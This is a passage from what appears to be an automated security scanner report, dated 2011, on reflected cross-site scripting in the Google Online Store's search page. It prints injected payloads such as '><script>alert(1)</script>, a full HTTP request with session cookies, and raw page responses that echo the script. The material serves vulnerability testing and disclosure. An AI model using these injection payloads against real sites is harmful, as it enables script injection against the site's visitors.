NvcmllcyZ4PTAmeT0wJnE9eHNzIDEyMyA0NTYgNzg5MCBmM2Q4YSBzY3JpcHQgYWxlcnQoMSkvc2NyaXB0IDE3MzQ5IDM3NDg0Jy8+IHhzcyAxMjMgNDU2IDc4OTAgZjNkOGEgc2NyaXB0IGFsZXJ0KDEpL3NjcmlwdCAxNzM0OSAzNzQ4NDwvYT4/PC9mb250PjwvaT48L2gyPjwvY2VudGVyPmQCCA8WAh8ABXo8ZGl2IGNsYXNzPSJuby1yZXN1bHRzIj5ObyBSZXN1bHRzIEZvdW5kIGZvciBzZWFyY2ggPGk+eHNzIDEyMyA0NTYgNzg5MGYzZDhhPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQCCw8WAh8ABZkDaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vc2hvcHBpbmcvc2VhcmNoL3YxL2N4OjAxNjQ1ODUwMTY0NTg4NDA1NzkxMjpkcV9peGJ3aHVrOC9wcm9kdWN0cz9mYWNldHMuZW5hYmxlZD10cnVlJmNvdW50cnk9dXMmbWF4UmVzdWx0cz0xMiZmYWNldHMudXNlR2NzQ29uZmlnPVRydWUmZmFjZXRzLmRpc2NvdmVyPTEwMDoxMDAmYWx0PWF0b20mc3BlbGxpbmcuZW5hYmxlZD10cnVlJnByb21vdGlvbnMuZW5hYmxlZD10cnVlJnByb21vdGlvbnMudXNlR2NzQ29uZmlnPXRydWUma2V5PUFJemFTeUNTSk1hdjZheWdqbFYzenUwdmw0MGpick1oZEtmRmNybyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YXNjcmlwdGFsZXJ0KDEpL3NjcmlwdDE3MzQ5ZjM3NDg0JnJlc3RyaWN0Qnk9Z3NjYXRlZ29yeSh0ZXh0KTphY2Nlc3Nvcmllc2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFE2N0bFNpZ251cCRidG5TaWduVXA=" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLQmZyIDwKs4eTNDgK6oZTsCg==" />
</div>
<input name="ctlSignup$EmailAddress" type="text" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

1.4. http://www.googlestore.com/googlesearch.aspx [x parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6861'><script>alert(1)</script>9708c90dfd3 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0e6861'><script>alert(1)</script>9708c90dfd3&y=0 HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.43.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2709

__VIEWSTATE=%2FwEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWxAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc%2BQmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmFzY2VuZGluZyc%2BUHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E%2BPGJyLz5kAgEPFgIeB1Zpc2libGVoFgICAQ8WAh8AZWQCAg8WAh8BaBYCAgEPFgIfAGVkAgMPFgIfAWgWAgIBDxYCHwBlZAIEDxYCHwBlZAIFDxYCHwAF0QI8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc%2BSG9tZTwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E%2BZAIGDxYCHwBlZAIHDxYCHwAFnQI8aDI%2BPGNlbnRlcj5EaWQgeW91IG1lYW4gPGk%2BPGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMmeD0wJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E%2BPzwvZm9udD48L2k%2BPC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQCCw8WAh8ABakDaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vc2hvcHBpbmcvc2VhcmNoL3YxL2N4OjAxNjQ1ODUwMTY0NTg4NDA1NzkxMjpkcV9peGJ3aHVrOC9wcm9kdWN0cz9mYWNldHMuZW5hYmxlZD10cnVlJmNvdW50cnk9dXMmbWF4UmVzdWx0cz0xMiZmYWNldHMudXNlR2NzQ29uZmlnPVRydWUmZmFjZXRzLmRpc2NvdmVyPTEwMDoxMDAmYWx0PWF0b20mc3BlbGxpbmcuZW5hYmxlZD10cnVlJnByb21vdGlvbnMuZW5hYmxlZD10cnVlJnByb21vdGlvbnMudXNlR2NzQ29uZmlnPXRydWUma2V5PUFJemFTeUNTSk1hdjZheWdqbFYzenUwdmw0MGpick1oZEtmRmNybyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YXNjcmlwdGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQxNzM0OWYzNzQ4NCZyZXN0cmljdEJ5PWdzY2F0ZWdvcnkodGV4dCk6YWNjZXNzb3JpZXNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRNjdGxTaWdudXAkYnRuU2lnblVw&__EVENTVALIDATION=%2FwEWAwLdgJGXBAKs4eTNDgK6oZTsCg%3D%3D&ctlSignup%24EmailAddress=cdd&ctlSignup%24btnSignUp.x=37&ctlSignup%24btnSignUp.y=7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20598
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:28:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0e6861scriptalert(1)/script9708c90dfd3&y=0&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0e6861scriptalert(1)/script9708c90dfd3&y=0&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>

</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" selected>Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Accessories</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"></div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484'/>accessories</a> / <a href='googlesearch.aspx?category=accessories'/>xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessories&x=0e6861'><script>alert(1)</script>9708c90dfd3&y=0&q=xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484'/> xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484</a>?</font></i></h2></center></div>
<div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(document.location)</script>17349f37484</i></div></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="formerror">Invalid Email Format</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAX7AzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MGU2ODYxc2NyaXB0YWxlcnQoMSkvc2NyaXB0OTcwOGM5MGRmZDMmeT0wJnJhbmtCeT1wcmljZTphc2NlbmRpbmcnPlByaWNlICgkLSQkJCk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3NvcmllcyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCZ4PTBlNjg2MXNjcmlwdGFsZXJ0KDEpL3NjcmlwdDk3MDhjOTBkZmQzJnk9MCZyYW5rQnk9cHJpY2U6ZGVzY2VuZGluZyc+UHJpY2UgKCQkJC0kKTwvYT48YnIvPmQCAQ8WAh4HVmlzaWJsZWgWAgIBDxYCHwBlZAICDxYCHwFoFgICAQ8WAh8AZWQCAw8WAh8BaBYCAgEPFgIfAGVkAgQPFgIfAGVkAgUPFgIfAAXRAjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Jz5Ib21lPC9hPiZuYnNwOy8mbmJzcDs8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9xPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCcvPmFjY2Vzc29yaWVzPC9hPiZuYnNwOy8mbmJzcDs8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3NvcmllcycvPnhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NDwvYT5kAgYPFgIfAGVkAgcPFgIfAAXIAjxoMj48Y2VudGVyPkRpZCB5b3UgbWVhbiA8aT48Zm9udCBjb2xvcj0nYmx1ZScgPiA8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3NvcmllcyZ4PTBlNjg2MSc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pjk3MDhjOTBkZmQzJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E+PzwvZm9udD48L2k+PC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgRmDw8WBh4IQ3NzQ2xhc3MFCWZvcm1lcnJvch4EVGV4dAUUSW52YWxpZCBFbWFpbCBGb3JtYXQeBF8hU0ICAmRkAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkAgsPFgIfAAWpA2h0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL3Nob3BwaW5nL3NlYXJjaC92MS9jeDowMTY0NTg1MDE2NDU4ODQwNTc5MTI6ZHFfaXhid2h1azgvcHJvZHVjdHM/ZmFjZXRzLmVuYWJsZWQ9dHJ1ZSZjb3VudHJ5PXVzJm1heFJlc3VsdHM9MTImZmFjZXRzLnVzZUdjc0NvbmZpZz1UcnVlJmZhY2V0cy5kaXNjb3Zlcj0xMDA6MTAwJmFsdD1hdG9tJnNwZWxsaW5nLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLnVzZUdjc0NvbmZpZz10cnVlJmtleT1BSXphU3lDU0pNYXY2YXlnamxWM3p1MHZsNDBqYnJNaGRLZkZjcm8mcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGFzY3JpcHRhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0MTczNDlmMzc0ODQmcmVzdHJpY3RCeT1nc2NhdGVnb3J5KHRleHQpOmFjY2Vzc29yaWVzZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUTY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLbmPLbCQKs4eTNDgK6oZTsCg==" />
</div>
<input name="ctlSignup$EmailAddress" type="text" value="cdd" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
